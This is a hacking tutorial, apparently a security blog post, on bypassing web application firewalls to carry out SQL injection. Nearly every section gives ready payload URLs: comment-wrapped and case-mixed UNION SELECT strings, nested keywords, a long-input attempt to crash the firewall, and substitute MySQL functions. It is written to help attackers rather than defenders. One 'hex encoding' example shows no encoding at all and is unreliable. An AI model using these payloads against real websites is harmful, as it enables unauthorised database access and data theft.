Let’s Begin!
How to know if there is a Web Application Firewall?
This is pretty simple! When you try to enter a command used for SQL Injections (usually the “UNION SELECT” command), you get an 403 Error (and the website says “Forbidden” or “Not Acceptable”).
Example:
http://www.site.com/index.php?page_id=-15 UNION SELECT 1,2,3,4....
(We get a 403 Error!)Basic/Simple Methods:
First, of course, we need to know the Basic Methods to bypass WAF…
1) Comments:
You can use comments to bypass WAF:
Code:
http://www.site.com/index.php?page_id=-15 /*!UNION*/ /*!SELECT*/ 1,2,3,4....
(First Method that can Bypass WAF)However, most WAF identify this method so they still show a “Forbidden” Error…
2) Change the Case of the Letters:
You can also change the Case of the Command:
Code:
http://www.site.com/index.php?page_id=-15 uNIoN sELecT 1,2,3,4....
(Another Basic Method to Bypass WAF!)However, as before, this trick is also detected by most WAF!
3) Combine the previous Methods:
What you can also do is to combine the previous two methods:
Code:
http://www.site.com/index.php?page_id=-15 /*!uNIOn*/ /*!SelECt*/ 1,2,3,4....
This method is not detectable by many Web Application Firewalls!4) Replaced Keywords:
Some Firewalls remove the “UNION SELECT” Statement when it is found in the URL… We can do this to exploit this function:
Code:
http://www.site.com/index.php?page_id=-15 UNIunionON SELselectECT 1,2,3,4....
(The "union" and the "select" will be removed, so the final result will be: "UNION SELECT" 😀 )5) Inline Comments (Thanks to Crysan):
Some firewalls get bypassed by Inserting Inline Comments between the “Union” and the “Select” Commands:
Code:
http://www.site.com/index.php?page_id=-15 UnION/**/SElecT 1,2,3,4...
(The U is equal to "U" and S to "S". See more on the Advanced Section....)I believe that these are the most basic Methods to WAF Bypassing! Let’s move on more advanced ones…
Advanced Methods:
Now that you have learned about Basic WAF Bypassing, I think it is good to understand more advanced Methods!
1) Buffer Overflow / Firewall Crash:
Many Firewalls are developed in C/C++ and we can Crash them using Buffer Overflow!
Code:
http://www.site.com/index.php?page_id=-15+and+(select 1)=(Select 0xAA[..(add about 1000 "A")..])+/*!uNIOn*/+/*!SeLECt*/+1,2,3,4....
(( You can test if the WAF can be crashed by typing:
?page_id=null
/**//*!50000UnIOn*//*yoyu*/all/**/
/*!SeLEct*/
/*nnaa*/+1,2,3,4....
If you get a 500, you can exploit it using the Buffer Overflow Method! :: Thanks Crysan for the Test))
2) Replace Characters with their HEX Values (Thanks to Crysan!):
We can replace some characters with their HEX (URL-Encoded) Values.
Example:
Code:
http://www.site.com/index.php?page_id=-15 /*!union*/ /*!select*/ 1,2,3,4....
(which means "union select")3) Use other Variables or Commands instead of the common ones for SQLi:
Apart from the “UNION SELECT” other commands might be blocked.
Common Commands Blocked:
COMMAND | WHAT TO USE INSTEAD
@@version | version()
concat() | concat_ws() --> Difference between concat() and concat_ws(): http://is.gd/VEeiDU
group_concat() | concat_ws()
[!]-> You can also try to SQL Inject with the NAME_CONST Method: http://is.gd/o10i0d (Created by Downfall)
Learning MySQL Really helps on such issues! 😉
4) Misc Exploitable Functions:
Many firewalls try to offer more Protection by adding Prototype or Strange Functions! (Which, of course, we can exploit!):
Example:
The firewall below replaces “*” (asterisks) with Whitespaces! What we can do is this:
Code:
http://www.site.com/index.php?page_id=-15+uni*on+sel*ect+1,2,3,4...
(If the Firewall removes the "*", the result will be: 15+union+select....)So, if you find such a silly function, you can exploit it, in this way! 😀
[+] In addition to the previous example, some other bypasses might be:
-15+(uNioN)+(sElECt)....
-15+(uNioN+SeleCT)+...
-15+(UnI)(oN)+(SeL)(ecT)+....
-15+union (select 1,2,3,4...)
Mads Security | Cyer News 